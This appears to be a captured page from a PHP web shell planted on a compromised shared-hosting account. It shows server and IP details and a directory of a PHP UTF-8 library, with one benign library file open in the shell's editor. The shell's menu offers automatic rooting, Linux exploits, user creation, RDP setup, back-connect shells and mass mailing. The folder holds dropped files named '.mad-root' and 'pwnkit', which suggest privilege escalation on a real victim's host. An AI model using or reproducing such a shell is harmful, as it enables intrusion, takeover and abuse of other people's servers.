Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
phputf8 /
[ HOME SHELL ]
Name
Size
Permission
Action
mbstring
[ DIR ]
drwxr-xr-x
native
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
25.81
KB
-rw-r--r--
README
3.29
KB
-rw-r--r--
ord.php
2.35
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
str_ireplace.php
1.95
KB
-rw-r--r--
str_pad.php
1.67
KB
-rw-r--r--
str_split.php
824
B
-rw-r--r--
strcasecmp.php
546
B
-rw-r--r--
strcspn.php
894
B
-rw-r--r--
stristr.php
855
B
-rw-r--r--
strrev.php
458
B
-rw-r--r--
strspn.php
923
B
-rw-r--r--
substr_replace.php
600
B
-rw-r--r--
trim.php
2.18
KB
-rw-r--r--
ucfirst.php
787
B
-rw-r--r--
ucwords.php
1.44
KB
-rw-r--r--
utf8.php
2.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : str_split.php
<?php /** * @version $Id$ * @package utf8 * @subpackage strings */ //--------------------------------------------------------------- /** * UTF-8 aware alternative to str_split * Convert a string to an array * Note: requires utf8_strlen to be loaded * @param string UTF-8 encoded * @param int number to characters to split string by * @return string characters in string reverses * @see http://www.php.net/str_split * @see utf8_strlen * @package utf8 * @subpackage strings */ function utf8_str_split($str, $split_len = 1) { if ( !preg_match('/^[0-9]+$/',$split_len) || $split_len < 1 ) { return FALSE; } $len = utf8_strlen($str); if ( $len <= $split_len ) { return array($str); } preg_match_all('/.{'.$split_len.'}|[^\x00]{1,'.$split_len.'}$/us', $str, $ar); return $ar[0]; }
Close